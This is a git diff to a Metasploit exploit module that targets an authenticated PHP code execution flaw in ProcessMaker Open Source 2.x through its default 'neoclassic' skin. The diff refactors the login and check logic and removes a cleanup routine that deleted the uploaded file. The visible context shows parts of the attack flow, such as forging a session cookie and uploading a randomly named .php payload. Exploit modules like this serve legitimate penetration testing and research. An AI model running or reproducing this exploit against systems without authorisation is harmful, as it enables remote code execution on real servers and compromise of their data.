diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index a58c8aaa4a..a507b478c6 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -15,12 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => "ProcessMaker Open Source Authenticated PHP Code Execution", 'Description' => %q{ - This module exploits a PHP code execution vulnerability in the + This module exploits a PHP code execution vulnerability in the 'neoclassic' skin for ProcessMaker Open Source which allows any - authenticated user to execute PHP code. - - The vulnerable skin is installed by default in version 2.x and - cannot be removed via the web interface. + authenticated user to execute PHP code. The vulnerable skin is + installed by default in version 2.x and cannot be removed via + the web interface. }, 'License' => MSF_LICENSE, 'Author' => 'Brendan Coles ', @@ -54,19 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - # - # Clean up on new session - # - def on_new_session(client) - print_warning("#{peer} - Deleting #{@fname}") - if client.type == "meterpreter" - client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") - client.fs.file.rm(@fname) - else - client.shell_command_token("rm #{@fname}") - end - end - # # Send command for execution # @@ -116,11 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE print_error("#{peer} - Connection failed") + return false end if res and res.code == 200 and res.body =~ /Loading styles and images/ print_good("#{peer} - Authenticated as user '#{user}'") + return true else - fail_with(Failure::NoAccess, "#{peer} - Authenticating as user '#{user}' failed") + print_error("#{peer} - Authenticating as user '#{user}' failed") + return false end end @@ -130,7 +119,9 @@ class Metasploit3 < Msf::Exploit::Remote def check # login @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" - login(datastore['USERNAME'], datastore['PASSWORD']) + unless login(datastore['USERNAME'], datastore['PASSWORD']) + return Exploit::CheckCode::Unknown + end # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) @@ -140,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable elsif res - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE print_error("#{peer} - Connection failed") @@ -172,14 +163,16 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - fail_with(Failure::Unreachable, "#{peer} - Connection failed") + fail_with(Failure::Unreachable, "#{peer} - Connection failed") end end def exploit # login @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" - login(datastore['USERNAME'], datastore['PASSWORD']) + unless login(datastore['USERNAME'], datastore['PASSWORD']) + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + end # upload payload @fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"